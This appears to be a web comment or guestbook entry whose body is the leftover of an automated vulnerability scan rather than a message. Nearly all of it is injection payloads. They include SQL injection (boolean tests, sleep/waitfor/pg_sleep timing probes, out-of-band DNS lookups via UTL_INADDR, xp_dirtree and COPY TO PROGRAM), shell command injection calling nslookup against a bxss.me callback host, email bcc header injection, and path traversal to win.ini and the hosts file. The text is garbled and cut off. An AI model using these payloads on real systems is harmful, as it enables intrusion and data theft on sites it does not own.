腹黒い茶 says to YSITD
` <script> 228' </script> <!-- 1 --> <script> 123 </script> <!-- 1 --> <script> response.write(9224586*9060259) </script> <!-- 1 --> <script> '+response.write(9224586*9060259)+' </script> <!-- 1 --> <script> 123 </script> <!-- 1 --> <script> "+response.write(9224586*9060259)+" </script> <!-- 1 --> <script> 123 </script> <!-- response.write(9014691*9753105) --> <script> 123 </script> <!-- 1 --> <script> X4xTxiPQ </script> <!-- '+response.write(9014691*9753105)+' --> <script> 123 </script> <!-- 1 --> <script> -1 OR 2+508-508-1=0+0+0+1 -- </script> <!-- "+response.write(9014691*9753105)+" --> <script> 123 </script> <!-- 1 --> <script> -1 OR 2+109-109-1=0+0+0+1 </script> <!-- 1 --> <script> -1' OR 2+638-638-1=0+0+0+1 -- </script> <!-- 1 --> <script> -1' OR 2+786-786-1=0+0+0+1 or 't2kLa4r1'=' </script> <!-- 1 --> <script> -1" OR 2+469-469-1=0+0+0+1 -- </script> <!-- 1 --> <script> if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/ </script> <!-- 1 --> <script> (select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/ </script> <!-- 1 --> <script> -1; waitfor delay '0:0:6' -- </script> <!-- 1 --> <script> -1); waitfor delay '0:0:6' -- </script> <!-- 1 --> <script> -1)); waitfor delay '0:0:6' -- </script> <!-- 1 --> <script> set|set&set </script> <!-- 1 --> <script> $(nslookup dns.ce.\065888.79-7109.79.23017.\1.bxss.me) </script> <!-- 1 --> <script> &nslookup dns.ce.\065888.79-7110.79.23017.\1.bxss.me&'\"`0&nslookup dns.ce.\065888.79-7110.79.23017.\1.bxss.me&`' </script> <!-- 1 --> <script> 1 waitfor delay '0:0:9' -- </script> <!-- 1 --> <script> liXBeodv'; waitfor delay '0:0:3' -- </script> <!-- 1 --> <script> dYUMCjYm'); waitfor delay '0:0:3' -- </script> <!-- 1 --> <script> oXG8ng7D')); waitfor delay '0:0:3' -- </script> <!-- set|set&set --> <script> 123 </script> <!-- 1 --> <script> -1;select pg_sleep(6); -- </script> <!-- 1 --> <script> 9Yi2dGT3 </script> <!-- oUIlKVPa --> <script> 123 </script> <!-- 1 --> <script> -1);select pg_sleep(6); -- </script> <!-- 1 --> <script> -1));select pg_sleep(6); -- </script> <!-- 1 --> <script> ez2P7bBX';select pg_sleep(6); -- </script> <!-- 1 --> <script> A0bQu8HC');select pg_sleep(6); -- </script> <!-- 1 --> <script> 123 bcc:065888.79-7121.79.23017.1@bxss.me </script> <!-- 1 --> <script> to@example.com> bcc:065888.79-7122.79.23017.1@bxss.me </script> <!-- 1 bcc:065888.79-7123.79.23017.1@bxss.me --> <script> 123 </script> <!-- 1 --> <script> JyDt2owA'));select pg_sleep(9); -- </script> <!-- 1 --> <script> ../../../../../../../../../../windows/win.ini </script> <!-- 1 --> <script> 123||UTL_INADDR.get_host_address('dns.'||'sqli.065888.79-7125.79.23017.1.bxss'||'.me') </script> <!-- 1 --> <script> C:\WINDOWS\system32\drivers\etc\hosts </script> <!-- 1 --> <script> ../../../../../../../../../../windows/win.ini.jpg </script> <!-- 1 --> <script> '||UTL_INADDR.get_host_address('dns.'||'sqli.065888.79-7126.79.23017.1.bxss'||'.me')||' </script> <!-- 1 --> <script> ������������������������������������������������windows��win.ini </script> <!-- 1 --> <script> ................windowswin.ini </script> <!-- 1 --> <script> 123;EXEC master..xp_dirtree '\\dns.sqli.065888.79-7127.79.23017.1.bxss.me\' -- </script> <!-- 1 --> <script> ..\..\..\..\..\..\..\..\windows\win.ini </script> <!-- 1 --> <script> 123';EXEC master..xp_dirtree '\\dns.sqli.065888.79-7128.79.23017.1.bxss.me\' -- </script> <!-- 1 --> <script> /.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini </script> <!-- 1 --> <script> 123');EXEC master..xp_dirtree '\\dns.sqli.065888.79-7129.79.23017.1.bxss.me\' -- </script> <!-- 1 --> <script> </script> <!-- 1 --> <script> ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini </script> <!-- 1 --> <script> 123;copy (select '') to program 'nslookup dns.sqli.\065888.79-7130.79.23017.\1.bxss.me' </script> <!-- 1 --> <script> 123';copy (select '') to program 'nslookup dns.sqli.\065888.79-7131.79.23017.\1.bxss.me </script> <!-- 1 --> <script> 12345'"\'\");